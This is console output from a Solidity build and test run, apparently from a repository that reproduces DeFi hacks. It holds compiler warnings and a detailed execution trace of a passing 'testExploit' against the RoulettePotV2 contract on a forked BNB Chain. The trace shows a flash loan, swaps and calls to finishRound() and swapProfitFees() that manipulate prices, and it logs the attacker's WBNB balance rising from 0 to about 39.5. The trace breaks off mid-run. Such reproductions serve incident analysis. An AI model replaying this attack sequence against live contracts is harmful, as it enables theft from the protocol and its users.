Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.29s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2025-01/RoulettePotV2_exp.sol:32:5:
   |
32 |     address internal constant RoulettePotV2 = 0xf573748637E0576387289f1914627d716927F90f;
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
  --> src/test/2025-01/RoulettePotV2_exp.sol:28:1:
   |
28 | contract RoulettePotV2 is BaseTestWithBalanceLog {
   | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2025-01/RoulettePotV2_exp.sol:33:5:
   |
33 |     address internal constant WBNB = 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c;
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:2436:1:
     |
2436 | interface WBNB {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2025-01/RoulettePotV2_exp.sol:50:37:
   |
50 |     function pancakeV3FlashCallback(uint256 fee0, uint256 fee1, bytes memory data) external {
   |                                     ^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 854.15ms (2.23ms CPU time)

Ran 1 test for src/test/2025-01/RoulettePotV2_exp.sol:RoulettePotV2
[PASS] testExploit() (gas: 1237440)
Logs:
  Attacker WBNB Balance Before exploit: 0.000000000000000000
  Attacker WBNB Balance After exploit: 39.521593515709821513

Traces:
  [10740] RoulettePotV2::setUp()
    ├─ [0] VM::createSelectFork("bsc", 45668285 [4.566e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [1552066] RoulettePotV2::testExploit()
    ├─ [3264] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::symbol() [staticcall]
    │   └─ ← [Return] "WBNB"
    ├─ [2534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(RoulettePotV2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [2444] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Attacker WBNB Balance Before exploit", val: 0, decimals: 18)
    ├─ [1504641] 0x172fcD41E0913e95784454622d1c3724f546f849::flash(0x824eb9faDFb377394430d2744fa7C42916DE3eCe, 0, 4203732130200000000000 [4.203e21], 0x0000000000000000000000000000000000000000000000e3e280a416eb21f000)
    │   ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x172fcD41E0913e95784454622d1c3724f546f849) [staticcall]
    │   │   └─ ← [Return] 3024076575304015256139990 [3.024e24]
    │   ├─ [2534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x172fcD41E0913e95784454622d1c3724f546f849) [staticcall]
    │   │   └─ ← [Return] 4801286726383412323585 [4.801e21]
    │   ├─ [10862] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(0x824eb9faDFb377394430d2744fa7C42916DE3eCe, 4203732130200000000000 [4.203e21])
    │   │   ├─ emit Transfer(from: 0x172fcD41E0913e95784454622d1c3724f546f849, to: 0x824eb9faDFb377394430d2744fa7C42916DE3eCe, value: 4203732130200000000000 [4.203e21])
    │   │   ├─  storage changes:
    │   │   │   @ 0x66ec1991f6397975a4f4a1234495c6e178d730f45f32c044c0a3953f810d8b92: 0x00000000000000000000000000000000000000000000001ee9ebae23f1433441 → 0x000000000000000000000000000000000000000000000102cc6c523adc652441
    │   │   │   @ 0xed93f154226bea5228a538ddd7f6e1b8d878a5d95dc495daa8ac4679fe6b0986: 0x000000000000000000000000000000000000000000000104473d0756a16a2501 → 0x00000000000000000000000000000000000000000000002064bc633fb6483501
    │   │   └─ ← [Return] true
    │   ├─ [1457870] RoulettePotV2::pancakeV3FlashCallback(0, 420373213020000000 [4.203e17], 0x0000000000000000000000000000000000000000000000e3e280a416eb21f000)
    │   │   ├─ [68848] 0x824eb9faDFb377394430d2744fa7C42916DE3eCe::swap(0, 17527795283271427200665 [1.752e22], RoulettePotV2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   ├─ [29971] 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD::transfer(RoulettePotV2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 17527795283271427200665 [1.752e22])
    │   │   │   │   ├─ emit Transfer(from: 0x824eb9faDFb377394430d2744fa7C42916DE3eCe, to: RoulettePotV2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 17527795283271427200665 [1.752e22])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x8a489ea344a3a07b0cdfa9d1a5f7e562e8e7801e934af5b7a32cbede3ef02c99: 0x00000000000000000000000000000000000000000000043767722584c26a878d → 0x000000000000000000000000000000000000000000000081386c159f69b3f0f4
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x0000000000000000000000000000000000000000000003b62f060fe558b69699
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x824eb9faDFb377394430d2744fa7C42916DE3eCe) [staticcall]
    │   │   │   │   └─ ← [Return] 4773990209911045563457 [4.773e21]
    │   │   │   ├─ [531] 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD::balanceOf(0x824eb9faDFb377394430d2744fa7C42916DE3eCe) [staticcall]
    │   │   │   │   └─ ← [Return] 2383695633846558257396 [2.383e21]
    │   │   │   ├─ emit Sync(reserve0: 4773990209911045563457 [4.773e21], reserve1: 2383695633846558257396 [2.383e21])
    │   │   │   ├─ emit Swap(sender: RoulettePotV2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 4203732130200000000000 [4.203e21], amount1In: 0, amount0Out: 0, amount1Out: 17527795283271427200665 [1.752e22], to: RoulettePotV2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 9: 0x0000000000000000000000000000e336fb730ea560e77cd1350475a4a6b1445b → 0x0000000000000000000000000000e33721e98c11585013b07c9adc386fd3122b
    │   │   │   │   @ 10: 0x00000000000000000000000000000040d15aba54ff2c6d49582944cd733c26f1 → 0x00000000000000000000000000000040d162cde2ac97995a04c90086a35ef37b
    │   │   │   │   @ 8: 0x6782327000000000043767722584c26a878d00000000001ee9ebae23f1433441 → 0x6782338a000000000081386c159f69b3f0f4000000000102cc6c523adc652441
    │   │   │   └─ ← [Stop]
    │   │   ├─ [234772] 0xf573748637E0576387289f1914627d716927F90f::finishRound()
    │   │   │   ├─ [7412] 0x30262cab106e2411B052ca83cd9Aa51e23678BfB::getRequestStatus(55550639235277310739075523571963728629146319512257653235275211833188002525247 [5.555e76]) [staticcall]
    │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000000186fd4ff41f7d36e884df5690fe3e72f5738a2d7eeff1e53670612124d3d55d4d
    │   │   │   ├─ [486] 0x2AB0e9e4eE70FFf1fB9D67031E44F6410170d00e::decimals() [staticcall]
    │   │   │   │   └─ ← [Return] 18
    │   │   │   ├─ [13044] 0x2AB0e9e4eE70FFf1fB9D67031E44F6410170d00e::transfer(0xdfAc7733c205C3A2a5E202293ebB37E4633BC286, 5915775945736601620461531446 [5.915e27])
    │   │   │   │   ├─ emit Transfer(from: 0xf573748637E0576387289f1914627d716927F90f, to: 0xdfAc7733c205C3A2a5E202293ebB37E4633BC286, value: 5915775945736601620461531446 [5.915e27])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xf9f91d847de21b6b1fa280573cd87e54185c3ba7749e57e8099ff7e14450914d: 0x00000000000000000000000000000000000000005d84711b5c80502c8e358c56 → 0x00000000000000000000000000000000000000004a6706d2befeeb2e4c1b5b20
    │   │   │   │   │   @ 0xdbbedb068a948738f52c1f2c9a0f437a2ac22f1b34eccbeb88cccb87fc119634: 0x00000000000000000000000000000000000000000380d95fc1321cac15e5ceca → 0x0000000000000000000000000000000000000000169e43a85eb381aa58000000
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ emit FinishedBet(: 6, : 27636 [2.763e4], : 18580 [1.858e4], : 0xdfAc7733c205C3A2a5E202293ebB37E4633BC286, : 19, : 7873663918604902430692297169 [7.873e27], : 5915775945736601620461531446 [5.915e27], : 5462721980647838561 [5.462e18], : 4104345781765225707 [4.104e18], : 15747327837209804861384594338 [1.574e28])
    │   │   │   ├─ emit LiquidityChanged(: 6, : 0xdfAc7733c205C3A2a5E202293ebB37E4633BC286, : 23026442307977690682874354464 [2.302e28], : 0, : true)
    │   │   │   ├─ emit RoundFinished(: 18580 [1.858e4], : 19)
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x59dd4b18488d12f51eda69757a0ed42a2010c14b564330cc74a06895e60c077e: 0x000000000000000000000000000000000000000032e1e26098e32e80f64e93a2 → 0
    │   │   │   │   @ 0x59dd4b18488d12f51eda69757a0ed42a2010c14b564330cc74a06895e60c0784: 0xffffffffffffffffffffffffffffffffffffffffed44f26678415ef18093c000 → 0xfffffffffffffffffffffffffffffffffffffffff398794e27319133b9a0d89b
    │   │   │   │   @ 0xfb9ce45064c7e7d9bf9deb4750ba7c94ab3d6e7418c5d76bf69966d39a9d42f6: 0 → 0x000000000000000000000000000000000000000000000000009fdf42f6e48000
    │   │   │   │   @ 5: 1 → 0
    │   │   │   │   @ 10: 27635 → 27636
    │   │   │   │   @ 7: 1 → 0
    │   │   │   │   @ 0x59dd4b18488d12f51eda69757a0ed42a2010c14b564330cc74a06895e60c077d: 0x00000000000000000000000000000000000000002aa28ebac39d21ab97e6f8b4 → 0x00000000000000000000000000000000000000004a6706d2befeeb2e4c1b5b20
    │   │   │   │   @ 6: 0x00000000000000000000000000000000000000000000000000000000678215d7 → 0
    │   │   │   └─ ← [Stop]
    │   │   ├─ [1096763] 0xf573748637E0576387289f1914627d716927F90f::swapProfitFees()
    │   │   │   ├─ [5151] 0x10ED43C718714eb63d5aA57B78B54704E256024E::getAmountsIn(8340000000000000000 [8.34e18], [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD]) [staticcall]
    │   │   │   │   ├─ [893] 0x824eb9faDFb377394430d2744fa7C42916DE3eCe::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 4773990209911045563457 [4.773e21], 2383695633846558257396 [2.383e21], 1736586122 [1.736e9]
    │   │   │   │   └─ ← [Return] [16803742961978141493 [1.68e19], 8340000000000000000 [8.34e18]]
    │   │   │   ├─ [5111] 0x10ED43C718714eb63d5aA57B78B54704E256024E::getAmountsOut(4171603472025223867 [4.171e18], [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD]) [staticcall]
    │   │   │   │   ├─ [893] 0x824eb9faDFb377394430d2744fa7C42916DE3eCe::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 4773990209911045563457 [4.773e21], 2383695633846558257396 [2.383e21], 1736586122 [1.736e9]
    │   │   │   │   └─ ← [Return] [4171603472025223867 [4.171e18], 2075901871252318736 [2.075e18]]
    │   │   │   ├─ [13671] 0x10ED43C718714eb63d5aA57B78B54704E256024E::getAmountsIn(45000000000000000 [4.5e16], [0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD]) [staticcall]
    │   │   │   │   ├─ [893] 0x824eb9faDFb377394430d2744fa7C42916DE3eCe::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 4773990209911045563457 [4.773e21], 2383695633846558257396 [2.383e21], 1736586122 [1.736e9]
    │   │   │   │   ├─ [2893] 0x58F876857a02D6762E0101bb5C46A8c1ED44Dc16::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 6669604963183553955721 [6.669e21], 4633647140979878589926781 [4.633e24], 1736586071 [1.736e9]
    │   │   │   │   └─ ← [Return] [62929511019333650347 [6.292e19], 90352158297182343 [9.035e16], 45000000000000000 [4.5e16]]
    │   │   │   ├─ [9075] 0x10ED43C718714eb63d5aA57B78B54704E256024E::getAmountsOut(9442741234770661142 [9.442e18], [0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD]) [staticcall]
    │   │   │   │   ├─ [893] 0x58F876857a02D6762E0101bb5C46A8c1ED44Dc16::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 6669604963183553955721 [6.669e21], 4633647140979878589926781 [4.633e24], 1736586071 [1.736e9]
    │   │   │   │   ├─ [893] 0x824eb9faDFb377394430d2744fa7C42916DE3eCe::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 4773990209911045563457 [4.773e21], 2383695633846558257396 [2.383e21], 1736586122 [1.736e9]
    │   │   │   │   └─ ← [Return] [9442741234770661142 [9.442e18], 13557738819430670 [1.355e16], 6752556306921394 [6.752e15]]
    │   │   │   ├─ [24562] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 9442741234770661142 [9.442e18])
    │   │   │   │   ├─ emit Approval(owner: 0xf573748637E0576387289f1914627d716927F90f, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 9442741234770661142 [9.442e18])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x885b7d6ce85ba8044287eab67875a5466376fd7b7229c16f9502c65981297b54: 0 → 0x000000000000000000000000000000000000000000000000830b5b1f8c704f16
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [106389] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForETH(9442741234770661142 [9.442e18], 0, [0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], 0xf573748637E0576387289f1914627d716927F90f, 1736586122 [1.736e9])
    │   │   │   │   ├─ [893] 0x58F876857a02D6762E0101bb5C46A8c1ED44Dc16::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 6669604963183553955721 [6.669e21], 4633647140979878589926781 [4.633e24], 1736586071 [1.736e9]
    │   │   │   │   ├─ [15634] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::transferFrom(0xf573748637E0576387289f1914627d716927F90f, 0x58F876857a02D6762E0101bb5C46A8c1ED44Dc16, 9442741234770661142 [9.442e18])
    │   │   │   │   │   ├─ emit Transfer(from: 0xf573748637E0576387289f1914627d716927F90f, to: 0x58F876857a02D6762E0101bb5C46A8c1ED44Dc16, value: 9442741234770661142 [9.442e18])
    │   │   │   │   │   ├─ emit Approval(owner: 0xf573748637E0576387289f1914627d716927F90f, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 0)
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x929729c8ede6948f663122c2a6323a9d736d8f553add6927f8c8bc52708f1282: 0x000000000000000000000000000000000000000000000000830b5b1f8c704f16 → 0
    │   │   │   │   │   │   @ 0x3f78ef6f0a13ff5ebe2099feb686bb1e55bae2ea947609b08baac59bc1bf58b8: 0x00000000000000000000000000000000000000000003d53683cc7e79eb308d7d → 0x00000000000000000000000000000000000000000003d53706d7d99977a0dc93
    │   │   │   │   │   │   @ 0x885b7d6ce85ba8044287eab67875a5466376fd7b7229c16f9502c65981297b54: 0x000000000000000000000000000000000000000000000000830b5b1f8c704f16 → 0
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [64339] 0x58F876857a02D6762E0101bb5C46A8c1ED44Dc16::swap(13557738819430670 [1.355e16], 0, 0x10ED43C718714eb63d5aA57B78B54704E256024E, 0x)
    │   │   │   │   │   ├─ [29962] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(0x10ED43C718714eb63d5aA57B78B54704E256024E, 13557738819430670 [1.355e16])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x58F876857a02D6762E0101bb5C46A8c1ED44Dc16, to: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 13557738819430670 [1.355e16])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xf1e03e4973193f89f2aa083d30a49755f07deae26a230485fdc9f8acee2c766f: 0x0000000000000000000000000000000000000000000001698f5cc8ef12004789 → 0x0000000000000000000000000000000000000000000001698f2c9e3e03b61e7b
    │   │   │   │   │   │   │   @ 0x1fb4de8f865d751e0e8d9986066405ce08df416aff5fdd6299ad70c234250abc: 0 → 0x00000000000000000000000000000000000000000000000000302ab10e4a290e
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x58F876857a02D6762E0101bb5C46A8c1ED44Dc16) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 6669591405444734525051 [6.669e21]
    │   │   │   │   │   ├─ [531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(0x58F876857a02D6762E0101bb5C46A8c1ED44Dc16) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 4633656583721113360587923 [4.633e24]
    │   │   │   │   │   ├─ emit Sync(reserve0: 6669591405444734525051 [6.669e21], reserve1: 4633656583721113360587923 [4.633e24])
    │   │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 0, amount1In: 9442741234770661142 [9.442e18], amount0Out: 13557738819430670 [1.355e16], amount1Out: 0, to: 0x10ED43C718714eb63d5aA57B78B54704E256024E)
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 9: 0x000000000000000000000000000ac3a445b5bfb421c0a550958d40ec6c762efc → 0x000000000000000000000000000ac3a4d01d8879bd497328af8dfa4708debfec
    │   │   │   │   │   │   @ 10: 0x0000000000000000000000000000000527ab30d662f864157939fecd6710b2d1 → 0x0000000000000000000000000000000527ab43a14c020dcd02bb42e66b15abcf
    │   │   │   │   │   │   @ 8: 0x6782335700000003d53683cc7e79eb308d7d0000000001698f5cc8ef12004789 → 0x6782338a00000003d53706d7d99977a0dc930000000001698f2c9e3e03b61e7b
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [9223] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::withdraw(13557738819430670 [1.355e16])
    │   │   │   │   │   ├─ [83] 0x10ED43C718714eb63d5aA57B78B54704E256024E::fallback{value: 13557738819430670}()
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ emit Withdrawal(src: 0x10ED43C718714eb63d5aA57B78B54704E256024E, wad: 13557738819430670 [1.355e16])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x1fb4de8f865d751e0e8d9986066405ce08df416aff5fdd6299ad70c234250abc: 0x00000000000000000000000000000000000000000000000000302ab10e4a290e → 0
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [55] 0xf573748637E0576387289f1914627d716927F90f::fallback{value: 13557738819430670}()
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Return] [9442741234770661142 [9.442e18], 13557738819430670 [1.355e16]]
    │   │   │   ├─ [13631] 0x10ED43C718714eb63d5aA57B78B54704E256024E::getAmountsIn(540000000000000000 [5.4e17], [0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD]) [staticcall]
    │   │   │   │   ├─ [893] 0x824eb9faDFb377394430d2744fa7C42916DE3eCe::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 4773990209911045563457 [4.773e21], 2383695633846558257396 [2.383e21], 1736586122 [1.736e9]
    │   │   │   │   ├─ [2893] 0x0eD7e52944161450477ee417DE9Cd3a859b14fD0::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 13409513124617170264621307 [1.34e25], 44758383630906034105878 [4.475e22], 1736586113 [1.736e9]
    │   │   │   │   └─ ← [Return] [325721336343852503289 [3.257e20], 1084451101736228096 [1.084e18], 540000000000000000 [5.4e17]]
    │   │   │   ├─ [9035] 0x10ED43C718714eb63d5aA57B78B54704E256024E::getAmountsOut(325721336343852503289 [3.257e20], [0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD]) [staticcall]
    │   │   │   │   ├─ [893] 0x0eD7e52944161450477ee417DE9Cd3a859b14fD0::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 13409513124617170264621307 [1.34e25], 44758383630906034105878 [4.475e22], 1736586113 [1.736e9]
    │   │   │   │   ├─ [893] 0x824eb9faDFb377394430d2744fa7C42916DE3eCe::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 4773990209911045563457 [4.773e21], 2383695633846558257396 [2.383e21], 1736586122 [1.736e9]
    │   │   │   │   └─ ← [Return] [325721336343852503289 [3.257e20], 1084451101736228096 [1.084e18], 540000000000000000 [5.4e17]]
    │   │   │   ├─ [24586] 0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 325721336343852503289 [3.257e20])
    │   │   │   │   ├─ emit Approval(owner: 0xf573748637E0576387289f1914627d716927F90f, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 325721336343852503289 [3.257e20])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x885b7d6ce85ba8044287eab67875a5466376fd7b7229c16f9502c65981297b54: 0 → 0x000000000000000000000000000000000000000000000011a84aa5a8bcdc50f9
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [104269] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForETH(325721336343852503289 [3.257e20], 0, [0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], 0xf573748637E0576387289f1914627d716927F90f, 1736586122 [1.736e9])
    │   │   │   │   ├─ [893] 0x0eD7e52944161450477ee417DE9Cd3a859b14fD0::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 13409513124617170264621307 [1.34e25], 44758383630906034105878 [4.475e22], 1736586113 [1.736e9]
    │   │   │   │   ├─ [15594] 0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82::transferFrom(0xf573748637E0576387289f1914627d716927F90f, 0x0eD7e52944161450477ee417DE9Cd3a859b14fD0, 325721336343852503289 [3.257e20])
    │   │   │   │   │   ├─ emit Transfer(from: 0xf573748637E0576387289f1914627d716927F90f, to: 0x0eD7e52944161450477ee417DE9Cd3a859b14fD0, value: 325721336343852503289 [3.257e20])
    │   │   │   │   │   ├─ emit Approval(owner: 0xf573748637E0576387289f1914627d716927F90f, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 0)
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x26c7faedc5f781c850550111a557f0e9b314f97941ed3fdb3f53337d6f8b55e7: 0x0000000000000000000000000000000000000000000b179329bfe1dc408d80fb → 0x0000000000000000000000000000000000000000000b17a4d20a8784fd69d1f4
    │   │   │   │   │   │   @ 0x885b7d6ce85ba8044287eab67875a5466376fd7b7229c16f9502c65981297b54: 0x000000000000000000000000000000000000000000000011a84aa5a8bcdc50f9 → 0
    │   │   │   │   │   │   @ 0x929729c8ede6948f663122c2a6323a9d736d8f553add6927f8c8bc52708f1282: 0x00000000000000000000000000000000000000000000001fc411c970348946eb → 0x00000000000000000000000000000000000000000000000e1bc723c777acf5f2
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [62339] 0x0eD7e52944161450477ee417DE9Cd3a859b14fD0::swap(0, 1084451101736228096 [1.084e18], 0x10ED43C718714eb63d5aA57B78B54704E256024E, 0x)
    │   │   │   │   │   ├─ [27962] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(0x10ED43C718714eb63d5aA57B78B54704E256024E, 1084451101736228096 [1.084e18])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x0eD7e52944161450477ee417DE9Cd3a859b14fD0, to: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 1084451101736228096 [1.084e18])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x774456c48aa6871068b68c947f132b492bb302d48e494377f521bc0164db1c16: 0x00000000000000000000000000000000000000000000097a5b59c43aac9e2e16 → 0x00000000000000000000000000000000000000000000097a4c4d05b2a5595916
    │   │   │   │   │   │   │   @ 0x1fb4de8f865d751e0e8d9986066405ce08df416aff5fdd6299ad70c234250abc: 0 → 0x0000000000000000000000000000000000000000000000000f0cbe880744d500
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [531] 0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82::balanceOf(0x0eD7e52944161450477ee417DE9Cd3a859b14fD0) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 13409838845953514117124596 [1.34e25]
    │   │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x0eD7e52944161450477ee417DE9Cd3a859b14fD0) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 44757299179804297877782 [4.475e22]
    │   │   │   │   │   ├─ emit Sync(reserve0: 13409838845953514117124596 [1.34e25], reserve1: 44757299179804297877782 [4.475e22])
    │   │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 325721336343852503289 [3.257e20], amount1In: 0, amount0Out: 0, amount1Out: 1084451101736228096 [1.084e18], to: 0x10ED43C718714eb63d5aA57B78B54704E256024E)
    │   │   │   │   │   ├─  storage changes:
